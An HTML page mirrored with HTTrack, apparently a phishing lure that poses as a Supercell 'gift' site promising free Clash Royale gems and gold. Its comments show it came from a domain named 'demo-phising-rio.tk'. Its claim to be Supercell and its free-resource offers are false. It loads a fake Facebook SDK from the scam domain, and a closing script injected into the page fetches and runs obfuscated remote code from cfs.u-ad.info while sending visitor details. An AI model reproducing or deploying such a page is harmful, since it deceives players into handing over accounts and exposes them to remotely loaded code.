<!DOCTYPE html>
<html lang="th">


<!-- Mirrored from new-events.top/Events-ClashOfClanss2017.com/Resource.html by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 15 Mar 2017 04:23:44 GMT -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Clash Royale - SUPERCELL GIFT</title>

    <!-- <link href="css/bootstrap.min.css" rel="stylesheet">
    <link href="css/flat-ui.min.css" rel="stylesheet">
    <link href="css/main.css" rel="stylesheet"> -->
    <link href="css/pb.min.css" rel="stylesheet">

    <!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
      <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
  </head>
  <body>
    <div id="fb-root"></div>
    <script>(function(d, s, id) {
      var js, fjs = d.getElementsByTagName(s)[0];
      if (d.getElementById(id)) return;
      js = d.createElement(s); js.id = id;
      js.src = "http://new-events.top/connect.facebook.net/en_US/sdk.html#xfbml=1&version=v2.3&appId=661774673967000";
      fjs.parentNode.insertBefore(js, fjs);
    }(document, 'script', 'facebook-jssdk'));</script>

    <div class="my-nav">
<span class="active"><a href="index.html">Free Card</a></span>
<span class="active"><a href="changename.html">Change Name</a></span>
<span class="active"><a href="resource.html">Resources</a></span>
</span>
    </div>

    <div class="container">
      <div class="row">
        <div class="center">
          <h1>
            SELECT THE RESOURCES YOU WANT<br>
            
          </h1>
        </div>

        <div class="clearfix"></div>

                  <div class="col-xs-12 col-sm-6 col-md-3">
            <div class="well">
              <div class="center">
                <img src="img/g1.png" alt="" class="img-rounded img-responsive item-bg img-center">
              </div>
              <p class="item">
                <b>Gems</b>
                <br>
               <select class="form-control" id="gems">
<option> Collect Gems ? </option>
<option> 80 Gems </option>
<option> 500 Gems </option>
<option> 1.200 Gems </option>
<option> 2.500 Gems </option>
<option> 6.500 Gems </option>
<option> 14.000 Gems </option>
</select>
                
                <br>
              </p>
              <a href="confirmation.html" class="btn btn-success btn-embossed btn-block">I Would Take This</a>
            </div>
          </div>
                  <div class="col-xs-12 col-sm-6 col-md-3">
            <div class="well">
              <div class="center">
                <img src="img/g2.png" alt="" class="img-rounded img-responsive item-bg img-center">
              </div>
              <p class="item">
                <b>Gold</b>
                <br>
              <select class="form-control" id="gold">
<option> Collect Gold ? </option>
<option> 1.000,000 Gold </option>
<option> 2.000,000 Gold </option>
<option> 4.000,000 Gold </option>
<option> 5.000,000 Gold </option>
<option> 6.000,000 Gold </option>
<option> 8.000,000 Gold </option>
</select>
                
                <br>
              </p>
              <a href="confirmation.html" class="btn btn-success btn-embossed btn-block">I Would Take This</a>
            </div>
          </div>
              
        
        <div class="clearfix"></div>

        <div class="center">
          <div class="fb-page" data-href="http://supercell.com/en/games/" data-width="1000" data-hide-cover="false" data-show-facepile="true" data-show-posts="true"><div class="fb-xfbml-parse-ignore"><blockquote cite="http://supercell.com/en/games/"><a href="http://supercell.com/en/games/">SUPERCELL</a></blockquote></div></div>
        </div>
      </div>
    </div>

    <footer class="footer">
      <div class="container">
Copyright &copy; 2017 SUPERCELL Game Corporation<br>
 Powered by SUPERCELL Game. Trademarks belong to their respective owners. All rights reserved. 
      </div>
    </footer>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582AaN6h071sG%2bK1PafbffoAyw5SWLbL9eVLW16LAf%2fo%2b76MlVjMjbnGcvkYXsNUk5thfbyBOD4jNUyeXe9aHKH4fjWgzggU0IABrwbUCHq04sFK9LHL9vZGk1qSfbQAok8NzObOPB4y6pEMd%2fUVuFDCURKExWS5%2faCTAkbLszq7%2bYDvNNYQnS%2f8w8GhblmgpxLZrMqI%2fLAcJnl%2bzBl2dcoP8EbcGPL5Ur8RrRhnrASc1hSZh2vgENhX3ctuLaDa%2bhL5L0JA4iJ4rQSdNjGzOpNzt5slRGMR6%2bxMorzcjvNL3wMxqxzninY1NM99%2f7Fe4MUCi6t693EJMYZCVa4gtY0sPvgzznR3TZqvfjRXX6kk4GZOCuWGYAu2%2b4QE4dGrsyVrXvNhT7fSkDAFyRTPv0nCoHVscWjLTZgSX%2fH%2fXjS2vVVWEHvu2fEPUSE%2bOEvCuJHNbEJ763Guf1QCc25Pfmz4M%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

<!-- Mirrored from www.garenaweb.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 19 Dec 2015 03:50:33 GMT -->

<!-- Mirrored from www.demo-phising-rio.tk/PBGI-V1/ by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 05 Jan 2017 04:12:38 GMT -->

<!-- Mirrored from new-events.top/Events-ClashOfClanss2017.com/Resource.html by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 15 Mar 2017 04:23:49 GMT -->
</html>